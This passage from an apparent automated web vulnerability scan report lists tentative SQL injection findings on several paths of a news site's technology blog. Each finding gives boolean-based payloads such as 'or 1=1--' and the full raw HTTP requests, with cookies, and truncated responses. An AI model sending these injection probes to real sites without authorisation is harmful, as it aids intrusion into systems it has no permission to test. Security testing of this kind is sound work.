                   <li class="i8"><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a></li>
                   <li class="i9"><a href="http://msn.whitepages.com/">White Pages</a></li>
                   <li class="i10"><a href="http://zone.redacted/en-us/home">Games</a></li>
                   <li class="i11"><a href="http://realestate.redacted/">Real Estate</a></li>
                   <li class="i12"><a href="http://wonderwall.redacted/">Wonderwall</a></l
...[SNIP]...

1.86. http://technolog.msnbc.redacted/blackberry [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://technolog.msnbc.redacted
Path:   /blackberry

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 10556100%20or%201%3d1--%20 and 10556100%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /blackberry?110556100%20or%201%3d1--%20=1 HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:58:36 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 120979

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
<img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=1621718033&amp;do=msnbc.redacted&amp;ad=53:9:80;44::;56:27:108;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>');</script>
<noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=1621718033&amp;do=msnbc.redacted&amp;ad=53:9:80;44::;56:27:108;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine-t vine_M3_template_BridgeTemplate">

<div class="chrome_header">
<header class="top_header">
<div id="network">
   <div class="content">
       <ul id="msn">
           <li class="msnLogo"><a href="http://www.redacted">MSN</a></li>
           <li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a></li>
           <li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
               <ul id="msn-more">
                   <li class="i1"><a href="http://autos.msn.com/">Autos</a></li>
                   <li class="i2"><a href="http://my.redacted/">My MSN</a></li>
                   <li class="i3"><a href="http://video.msn.com/video.aspx?mkt=en-us&amp;from=MSNHP">Video</a></li>
                   <li class="i4"><a href="http://careers.msn.com/">Careers &amp; Jobs</a></li>
                   <li class="i5"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&amp;BannerID=670268">Personals</a></li>
                   <li class="i6"><a href="http://local.msn.com/weather.aspx">Weather</a></li>
                   <li class="i7"><a href="http://www.delish.com/">Delish</a></li>
                   <li class="i8"><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a></li>
                   <li class="i9"><a href="http://msn.whitepages.com/">White Pages</a></li>
                   <li class="i10"><a href="http://zone.redacted/en-us/home">Games</a></li>
                   <li class="i11"><a href="http://realestate.redacted/">Real Estate</a></li>
                   <li class="i12"><a href="http://wonderwall.redacted/">Wonderwall</a></li>
                   <li class="i13"><a href="http://astrocenter.astrology.redacted">Horoscopes</a></li>
                   <li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li>
                   <li
...[SNIP]...

Request 2

GET /blackberry?110556100%20or%201%3d2--%20=1 HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:58:39 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 120989

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
<img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=258204426&amp;do=msnbc.redacted&amp;ad=53:9:80;44::;56:27:108;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>');</script>
<noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=258204426&amp;do=msnbc.redacted&amp;ad=53:9:80;44::;56:27:108;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine-t vine_M3_template_BridgeTemplate">

<div class="chrome_header">
<header class="top_header">
<div id="network">
   <div class="content">
       <ul id="msn">
           <li class="msnLogo"><a href="http://www.redacted">MSN</a></li>
           <li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a></li>
           <li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
               <ul id="msn-more">
                   <li class="i1"><a href="http://autos.msn.com/">Autos</a></li>
                   <li class="i2"><a href="http://my.redacted/">My MSN</a></li>
                   <li class="i3"><a href="http://video.msn.com/video.aspx?mkt=en-us&amp;from=MSNHP">Video</a></li>
                   <li class="i4"><a href="http://careers.msn.com/">Careers &amp; Jobs</a></li>
                   <li class="i5"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&amp;BannerID=670268">Personals</a></li>
                   <li class="i6"><a href="http://local.msn.com/weather.aspx">Weather</a></li>
                   <li class="i7"><a href="http://www.delish.com/">Delish</a></li>
                   <li class="i8"><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a></li>
                   <li class="i9"><a href="http://msn.whitepages.com/">White Pages</a></li>
                   <li class="i10"><a href="http://zone.redacted/en-us/home">Games</a></li>
                   <li class="i11"><a href="http://realestate.redacted/">Real Estate</a></li>
                   <li class="i12"><a href="http://wonderwall.redacted/">Wonderwall</a></li>
                   <li class="i13"><a href="http://astrocenter.astrology.redacted">Horoscopes</a></li>
                   <li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li>
                   <li cl
...[SNIP]...

1.87. http://technolog.msnbc.redacted/facebook [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://technolog.msnbc.redacted
Path:   /facebook

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /facebook?1%20and%201%3d1--%20=1 HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:39:13 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 127223

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
<img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=1384947188&amp;do=msnbc.redacted&amp;ad=53:9:80;44::;56:27:108;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>');</script>
<noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=1384947188&amp;do=msnbc.redacted&amp;ad=53:9:80;44::;56:27:108;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine-t vine_M3_template_BridgeTemplate">

<div class="chrome_header">
<header class="top_header">
<div id="network">
   <div class="content">
       <ul id="msn">
           <li class="msnLogo"><a href="http://www.redacted">MSN</a></li>
           <li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a></li>
           <li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
               <ul id="msn-more">
                   <li class="i1"><a href="http://autos.msn.com/">Autos</a></li>
                   <li class="i2"><a href="http://my.redacted/">My MSN</a></li>
                   <li class="i3"><a href="http://video.msn.com/video.aspx?mkt=en-us&amp;from=MSNHP">Video</a></li>
                   <li class="i4"><a href="http://careers.msn.com/">Careers &amp; Jobs</a></li>
                   <li class="i5"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&amp;BannerID=670268">Personals</a></li>
                   <li class="i6"><a href="http://local.msn.com/weather.aspx">Weather</a></li>
                   <li class="i7"><a href="http://www.delish.com/">Delish</a></li>
                   <li class="i8"><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a></li>
                   <li class="i9"><a href="http://msn.whitepages.com/">White Pages</a></li>
                   <li class="i10"><a href="http://zone.redacted/en-us/home">Games</a></li>
                   <li class="i11"><a href="http://realestate.redacted/">Real Estate</a></li>
                   <li class="i12"><a href="http://wonderwall.redacted/">Wonderwall</a></li>
                   <li class="i13"><a href="http://astrocenter.astrology.redacted">Horoscopes</a></li>
                   <li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li>
                   <li
...[SNIP]...

Request 2

GET /facebook?1%20and%201%3d2--%20=1 HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:39:18 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 127213

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
<img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=564508669&amp;do=msnbc.redacted&amp;ad=53:9:80;44::;56:27:108;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>');</script>
<noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=564508669&amp;do=msnbc.redacted&amp;ad=53:9:80;44::;56:27:108;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine-t vine_M3_template_BridgeTemplate">

<div class="chrome_header">
<header class="top_header">
<div id="network">
   <div class="content">
       <ul id="msn">
           <li class="msnLogo"><a href="http://www.redacted">MSN</a></li>
           <li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a></li>
           <li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
               <ul id="msn-more">
                   <li class="i1"><a href="http://autos.msn.com/">Autos</a></li>
                   <li class="i2"><a href="http://my.redacted/">My MSN</a></li>
                   <li class="i3"><a href="http://video.msn.com/video.aspx?mkt=en-us&amp;from=MSNHP">Video</a></li>
                   <li class="i4"><a href="http://careers.msn.com/">Careers &amp; Jobs</a></li>
                   <li class="i5"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&amp;BannerID=670268">Personals</a></li>
                   <li class="i6"><a href="http://local.msn.com/weather.aspx">Weather</a></li>
                   <li class="i7"><a href="http://www.delish.com/">Delish</a></li>
                   <li class="i8"><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a></li>
                   <li class="i9"><a href="http://msn.whitepages.com/">White Pages</a></li>
                   <li class="i10"><a href="http://zone.redacted/en-us/home">Games</a></li>
                   <li class="i11"><a href="http://realestate.redacted/">Real Estate</a></li>
                   <li class="i12"><a href="http://wonderwall.redacted/">Wonderwall</a></li>
                   <li class="i13"><a href="http://astrocenter.astrology.redacted">Horoscopes</a></li>
                   <li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li>
                   <li cl
...[SNIP]...

1.88. http://technolog.msnbc.redacted/featured [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://technolog.msnbc.redacted
Path:   /featured

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 14912380'%20or%201%3d1--%20 and 14912380'%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /featured?114912380'%20or%201%3d1--%20=1 HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=299
Date: Sun, 30 Jan 2011 02:39:36 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 139058

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
<img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=1733253576&amp;do=msnbc.redacted&amp;ad=53:9:80;44::;56:27:108;58:58:178;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>');</script>
<noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=1733253576&amp;do=msnbc.redacted&amp;ad=53:9:80;44::;56:27:108;58:58:178;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine-t vine_M3_template_BridgeTemplate">

<div class="chrome_header">
<header class="top_header">
<div id="network">
   <div class="content">
       <ul id="msn">
           <li class="msnLogo"><a href="http://www.redacted">MSN</a></li>
           <li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a></li>
           <li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
               <ul id="msn-more">
                   <li class="i1"><a href="http://autos.msn.com/">Autos</a></li>
                   <li class="i2"><a href="http://my.redacted/">My MSN</a></li>
                   <li class="i3"><a href="http://video.msn.com/video.aspx?mkt=en-us&amp;from=MSNHP">Video</a></li>
                   <li class="i4"><a href="http://careers.msn.com/">Careers &amp; Jobs</a></li>
                   <li class="i5"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&amp;BannerID=670268">Personals</a></li>
                   <li class="i6"><a href="http://local.msn.com/weather.aspx">Weather</a></li>
                   <li class="i7"><a href="http://www.delish.com/">Delish</a></li>
                   <li class="i8"><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a></li>
                   <li class="i9"><a href="http://msn.whitepages.com/">White Pages</a></li>
                   <li class="i10"><a href="http://zone.redacted/en-us/home">Games</a></li>
                   <li class="i11"><a href="http://realestate.redacted/">Real Estate</a></li>
                   <li class="i12"><a href="http://wonderwall.redacted/">Wonderwall</a></li>
                   <li class="i13"><a href="http://astrocenter.astrology.redacted">Horoscopes</a></li>
                   <li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shoppin
...[SNIP]...

Request 2

GET /featured?114912380'%20or%201%3d2--%20=1 HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:39:37 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 139048

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
<img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=8133541&amp;do=msnbc.msn.com&amp;ad=53:9:80;44::;56:27:108;58:58:178;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>');</script>
<noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=8133541&amp;do=msnbc.msn.com&amp;ad=53:9:80;44::;56:27:108;58:58:178;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine-t vine_M3_template_BridgeTemplate">

<div class="chrome_header">
<header class="top_header">
<div id="network">
   <div class="content">
       <ul id="msn">
           <li class="msnLogo"><a href="http://www.redacted">MSN</a></li>
           <li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a></li>
           <li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
               <ul id="msn-more">
                   <li class="i1"><a href="http://autos.msn.com/">Autos</a></li>
                   <li class="i2"><a href="http://my.redacted/">My MSN</a></li>
                   <li class="i3"><a href="http://video.msn.com/video.aspx?mkt=en-us&amp;from=MSNHP">Video</a></li>
                   <li class="i4"><a href="http://careers.msn.com/">Careers &amp; Jobs</a></li>
                   <li class="i5"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&amp;BannerID=670268">Personals</a></li>
                   <li class="i6"><a href="http://local.msn.com/weather.aspx">Weather</a></li>
                   <li class="i7"><a href="http://www.delish.com/">Delish</a></li>
                   <li class="i8"><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a></li>
                   <li class="i9"><a href="http://msn.whitepages.com/">White Pages</a></li>
                   <li class="i10"><a href="http://zone.redacted/en-us/home">Games</a></li>
                   <li class="i11"><a href="http://realestate.redacted/">Real Estate</a></li>
                   <li class="i12"><a href="http://wonderwall.redacted/">Wonderwall</a></li>
                   <li class="i13"><a href="http://astrocenter.astrology.redacted">Horoscopes</a></li>
                   <li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a><
...[SNIP]...

1.89. http://technolog.msnbc.redacted/justin-bieber [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://technolog.msnbc.redacted
Path:   /justin-bieber

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 68290612%20or%201%3d1--%20 and 68290612%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /justin-bieber?168290612%20or%201%3d1--%20=1 HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 03:04:20 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 135277

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
<img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=752376566&amp;do=msnbc.redacted&amp;ad=53:9:80;44::;56:27:108;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>');</script>
<noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=752376566&amp;do=msnbc.redacted&amp;ad=53:9:80;44::;56:27:108;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine-t vine_M3_template_BridgeTemplate">

<div class="chrome_header">
<header class="top_header">
<div id="network">
   <div class="content">
       <ul id="msn">
           <li class="msnLogo"><a href="http://www.redacted">MSN</a></li>
           <li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a></li>
           <li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
               <ul id="msn-more">
                   <li class="i1"><a href="http://autos.msn.com/">Autos</a></li>
                   <li class="i2"><a href="http://my.redacted/">My MSN</a></li>
                   <li class="i3"><a href="http://video.msn.com/video.aspx?mkt=en-us&amp;from=MSNHP">Video</a></li>
                   <li class="i4"><a href="http://careers.msn.com/">Careers &amp; Jobs</a></li>
                   <li class="i5"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&amp;BannerID=670268">Personals</a></li>
                   <li class="i6"><a href="http://local.msn.com/weather.aspx">Weather</a></li>
                   <li class="i7"><a href="http://www.delish.com/">Delish</a></li>
                   <li class="i8"><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a></li>
                   <li class="i9"><a href="http://msn.whitepages.com/">White Pages</a></li>
                   <li class="i10"><a href="http://zone.redacted/en-us/home">Games</a></li>
                   <li class="i11"><a href="http://realestate.redacted/">Real Estate</a></li>
                   <li class="i12"><a href="http://wonderwall.redacted/">Wonderwall</a></li>
                   <li class="i13"><a href="http://astrocenter.astrology.redacted">Horoscopes</a></li>
                   <li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li>
                   <li cl
...[SNIP]...

Request 2

GET /justin-bieber?168290612%20or%201%3d2--%20=1 HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 03:04:21 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 135287

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
<img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=1280493596&amp;do=msnbc.redacted&amp;ad=53:9:80;44::;56:27:108;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>');</script>
<noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=1280493596&amp;do=msnbc.redacted&amp;ad=53:9:80;44::;56:27:108;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine-t vine_M3_template_BridgeTemplate">

<div class="chrome_header">
<header class="top_header">
<div id="network">
   <div class="content">
       <ul id="msn">
           <li class="msnLogo"><a href="http://www.redacted">MSN</a></li>
           <li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a></li>
           <li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
               <ul id="msn-more">
